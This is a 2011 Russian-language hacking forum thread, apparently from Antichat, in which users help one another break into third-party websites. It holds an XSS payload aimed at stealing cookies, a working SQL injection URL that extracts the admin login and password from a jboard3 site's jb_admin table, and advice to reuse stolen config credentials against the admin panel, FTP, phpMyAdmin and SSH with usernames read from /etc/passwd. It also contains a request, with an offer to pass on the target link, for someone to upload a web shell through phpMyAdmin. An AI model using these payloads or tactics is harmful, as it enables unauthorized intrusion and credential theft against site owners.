 |
|
10.03.2011, 12:51
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от stasiliy
пробовал, не выходит
А в /etc/passwd можно откопать имя пользователя???
данный файл носит больше информационную нагрузку..имена пользователей системы ты там найдешь...но это тебе не поможет...попробуй подключится к базе айпи_адресс_сервера:3306 (но скорее всего не получится, как тебе уже говорили), посмотри на 2ип.ру какие еще сайты есть на серванте, попробуй у соседей почитать конфиги..может где и есть бейсик авторизация в админку..
|
|
|
10.03.2011, 13:21
|
|
Познающий
Регистрация: 18.12.2010
Сообщений: 35
С нами:
8105366
Репутация:
0
|
|
Проблема с фильтрацией двойных ковычек в ксс...
В общем проблема:
Сообщение от None
...
value="alert(document.cookie)">
И так:
Сообщение от None
...
value="
>
alert(document.cookie)">
Так-то оно вроде все нормально, но мне нужно выйти за приделы value, если подставить двойную кавычку, она фильтруется через htmlspecialchars()...
Пробовал и так:
Сообщение от None
data:text/html;base64,Ij48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2 tpZSk8L3NjcmlwdD4=
Но пока безуспешно... Подскажите что-нибудь. |
|
|
|
10.03.2011, 13:30
|
|
Новичок
Регистрация: 26.09.2009
Сообщений: 9
С нами:
8750305
Репутация:
0
|
|
Есть скул на jboard3
Код:
export.php?t=php&n=5&c=0&r=40%20UNION%20SELECT%201,2,3,4,concat%28table_schema,0x2e,TABLE_NAME%29%20FROM%20INFORMATION_SCHEMA.TABLES%23
Помогите выудить логин и пасс админа, структура таблиц вот:
Код:
`jb_admin`
--
CREATE TABLE `jb_admin` (
`login` varchar(32) NOT NULL,
`password` varchar(32) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
|
|
|
|
10.03.2011, 18:19
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от stasiliy
Помогите, плз
Имею
пхп-инъек
..
Вытащил
config.php
- получил данные к mysql, но
host:localhost
Вопрос: как можно узнать
mysql.server
???
спасибо Как тебе уже сказали, подключиться удаленно к БД получится вряд ли. Ну тут есть пару вариантов:
1) попробовать вытащенный пасс из конфига к админке с юзером: admin, adm, administrator и с юзером, который был вытащен из конфига.
2) попробовать подключиться к FTP. пасс: из конфига. юзер: "админовские", из конфига который, из /etc/passwd
3) попробовать найти на домене phpMyAdmin и с данным пассом подключиться к ней. Юзеров опять же пробовать "админовских", из конфига который, из /etc/passwd
4) попробовать подключиться к SSH. Пароль из конфига. Юзеры: "админовские", root, из конфига, из /etc/passwd.
P.S.: Если в /etc/passwd дохера юзеров (т.е. имя системного пользователя для каждого аккаунта на хостинге), то нет смысла пробовать пробить все! Тебе из /etc/passwd нужно имя пользователя-владельца, где ты нашел инклюд.
bluesky На античате куча статей по SQL-иньекциям, советую почитать
Запрос тебе нужен такой:
export.php?t=php&n=5&c=0&r=40+UNION+SELECT+1,2,3,4 ,concat(login,0x3a,password)+FROM+jb_admin--+
Moriarty, ты не поставил комменатрий, без которого запрос может не обрезать и SQL-запрос вызовет ошибку. Ну и '::' нет смысла) А вдруг mq? Который обычно включен всегда. Правильнее захексить: 0x3a3a.
|
|
|
|
10.03.2011, 21:10
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Требуется помощь в заливке шелла через phpMyAdmin
5.1.41-3ubuntu12.10:root@localhost:debian-linux-gnu
file_priv=Y
MQ=on
|
|
|
|
10.03.2011, 21:14
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
ты не нуждаешся в помощи, только нужно найти путь к папке где есть права на заливку, что еще надо?
|
|
|
|
10.03.2011, 21:22
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от Konqi
ты не нуждаешся в помощи, только нужно найти путь к папке где есть права на заливку, что еще надо?
Перебрал более 30 папок, но такой не нашел.
Сейчас пытаюсь залить через URL двойным запросом, но пока не очень получается.
|
|
|
|
10.03.2011, 21:33
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Не получается.
Кто возмется залить, скину линк в ПМ.
|
|
|
|
10.03.2011, 21:44
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от FlaktW
Перебрал более 30 папок, но такой не нашел.
Сейчас пытаюсь залить через URL двойным запросом, но пока не очень получается.
а если не нашел тогда чем поможет тебе двойной запрос?
все равно прав не будет, тама скани директории сайта,реверсни IP, мб найдеш инклуд в соседних сайтах
|
|
|
|
10.03.2011, 22:00
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от Konqi
а если не нашел тогда чем поможет тебе двойной запрос?
все равно прав не будет, тама скани директории сайта,реверсни IP, мб найдеш инклуд в соседних сайтах
там два сайта. один на php, второй на asp.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
